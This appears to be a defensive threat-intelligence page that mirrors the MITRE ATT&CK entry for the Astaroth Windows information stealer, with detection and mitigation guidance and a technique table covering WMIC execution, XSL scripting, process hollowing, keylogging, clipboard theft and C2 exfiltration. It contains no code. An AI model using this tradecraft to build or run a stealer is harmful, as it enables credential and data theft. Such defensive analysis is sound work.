S0373: Astaroth
Analyst context for executives and security teams
Astaroth is a Windows Trojan and information stealer publicly known since at least 2017 and described by ATT&CK as affecting organizations in Europe, Brazil, and Latin America. Its business significance is not just malware presence; the mapped behaviors show a full theft workflow: user-driven execution, abuse of legitimate Windows components, obfuscation, discovery, credential and clipboard collection, local staging, command-and-control, and exfiltration.
Executive priority
Prioritize Astaroth as a validation case for endpoint visibility, identity-risk reduction, and incident response readiness on Windows systems. Leaders should ask whether the organization can prove collection of process, script, WMI, command-line, file, and network evidence needed to investigate an information-stealing intrusion, especially where user-opened files and legitimate Windows utilities may be involved. This is also relevant for audit evidence around malware defense, credential protection, data loss monitoring, and regional risk where Europe, Brazil, or Latin America exposure matters.
Technical view
ATT&CK provides no official detection text for Astaroth, so defenders should build coverage from the related techniques. Validate monitoring for Windows execution through WMI, cmd, Visual Basic/JScript, CHM, Regsvr32, and shared module loading; stealth indicators such as software packing, encoded/encrypted files, command obfuscation, deobfuscation, and process hollowing; discovery of system, network, time, and running process information; collection via keylogging and clipboard access; local data staging; ingress tool transfer; C2 through dead-drop resolvers and standard encoding; and exfiltration over the C2 channel.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- WMI activity and parent-child process relationships
- Script execution telemetry for Visual Basic, JScript/JavaScript, and command shell usage
- Module load and DLL/shared module activity
- Regsvr32.exe and CHM/HTML Help execution events
Detection direction
- Because MITRE provides no official detection guidance for this malware object, start with technique-level analytics rather than a single malware signature.
- Correlate user-opened malicious file behavior with follow-on script, WMI, cmd, Regsvr32, CHM, or module-loading activity on Windows endpoints.
- Tune for suspicious use of legitimate Windows components while accounting for administrative software, help files, scripts, and management tooling that may create false positives.
- Look for chained behavior: obfuscated or encoded content, decoding activity, discovery commands, credential or clipboard collection signals, local staging, then outbound C2 or exfiltration-like traffic.
- Pay special attention to visibility gaps caused by software packing, command obfuscation, encoded files, and process hollowing, since these can reduce the value of simple hash or command-string matching.
Mitigation priorities
- Reduce user-execution risk through hardened email/web delivery controls and user-focused handling of suspicious files, consistent with the mapped malicious-file execution behavior.
- Restrict and monitor abuse-prone Windows utilities and scripting paths such as WMI, command shell, Visual Basic/JScript, CHM handling, and Regsvr32 where business operations allow.
- Strengthen endpoint protection and logging for packed/encoded files, process hollowing, module loading, and suspicious parent-child process chains.
- Protect credentials by prioritizing controls and monitoring around keylogging risk, clipboard exposure, and unusual authentication activity following suspected infection.
- Ensure network egress monitoring can identify unusual dead-drop resolver, tool transfer, encoded C2, and exfiltration-over-C2 patterns.
Analyst notes and limits
Astaroth is a useful ATT&CK object for testing whether a SOC can connect endpoint, identity, and network evidence into one intrusion narrative. The strongest defensive value comes from validating telemetry coverage across the related techniques, not from treating the malware name alone as a detection strategy.
The supplied ATT&CK object has no official detection text, no aliases, no labels, and no explicit tactics listed on the malware object itself. Technique relationships provide behavioral context, but local prevalence, active campaigns, exact indicators, and confirmed exposure require environment-specific intelligence and telemetry.
Astaroth
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1102.001 | Dead Drop Resolver Sub-technique | Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1124 | System Time Discovery | Astaroth collects the timestamp from the infected machine. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Astaroth loads its module with the XSL script parameter |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Astaroth has used an XOR-based algorithm to encrypt payloads twice with different keys.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1115 | Clipboard Data | Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1082 | System Information Discovery | Astaroth collects the machine name and keyboard language from the system. CitationCofense Astaroth Sept 2018CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1497.001 | System Checks Sub-technique | Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1129 | Shared Modules | Astaroth uses the LoadLibraryExW() function to load additional modules. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Astaroth has used malicious VBS e-mail attachments for execution.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1057 | Process Discovery | Astaroth searches for different processes on the system.CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Astaroth has used malicious files including VBS, LNK, and HTML for execution.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. CitationCybereason Astaroth Feb 2019CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | Astaroth encodes data using Base64 before sending it to the C2 server. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1027.002 | Software Packing Sub-technique | Astaroth uses a software packer called Pe123\RPolyCryptor.CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Astaroth can be loaded through regsvr32.exe.CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Astaroth checks for the presence of Avast antivirus in the |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Astaroth has been delivered via malicious e-mail attachments.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1056.001 | Keylogging Sub-technique | Astaroth logs keystrokes from the victim's machine. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1574.001 | DLL Sub-technique | Astaroth can launch itself via DLL Search Order Hijacking.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Astaroth uses JavaScript to perform its core functionalities. CitationCofense Astaroth Sept 2018CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Astaroth exfiltrates collected information from its r1.log file to the external C2 server. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1220 | XSL Script Processing | Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1016 | System Network Configuration Discovery | Astaroth collects the external IP address from the system. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.CitationCybereason Astaroth Feb 2019CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1547.009 | Shortcut Modification Sub-technique | Astaroth's initial payload is a malicious .LNK file. CitationCofense Astaroth Sept 2018CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1047 | Windows Management Instrumentation | Astaroth uses WMIC to execute payloads. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1555 | Credentials from Password Stores | Astaroth uses an external software known as NetPass to recover passwords. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1552 | Unsecured Credentials | Astaroth uses an external software known as NetPass to recover passwords. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | Astaroth has obfuscated and randomized parts of the JScript code it is initiating.CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1564.004 | NTFS File Attributes Sub-technique | Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads.CitationSecurelist Brazilian Banking Malware July 2020 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Astaroth creates a startup item for persistence. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1218.001 | Compiled HTML File Sub-technique | Astaroth uses ActiveX objects for file execution and manipulation. CitationCofense Astaroth Sept 2018 |
| Enterprise | T1568.002 | Domain Generation Algorithms Sub-technique | Astaroth has used a DGA in C2 communications.CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Astaroth spawns a CMD process to execute commands. CitationCybereason Astaroth Feb 2019 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Astaroth collects data in a plaintext file named r1.log before exfiltration. CitationCofense Astaroth Sept 2018 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.3 | Current bundle | 71f65e9ba853… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Cybereason Astaroth Feb 2019
Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
Open source URL -
[2]
Cofense Astaroth Sept 2018
Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved September 25, 2024.
Open source URL -
[3]
Securelist Brazilian Banking Malware July 2020
GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
Open source URL -
[4]
Guildma
(Citation: Securelist Brazilian Banking Malware July 2020)
-
[5]
mitre-attack S0373Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.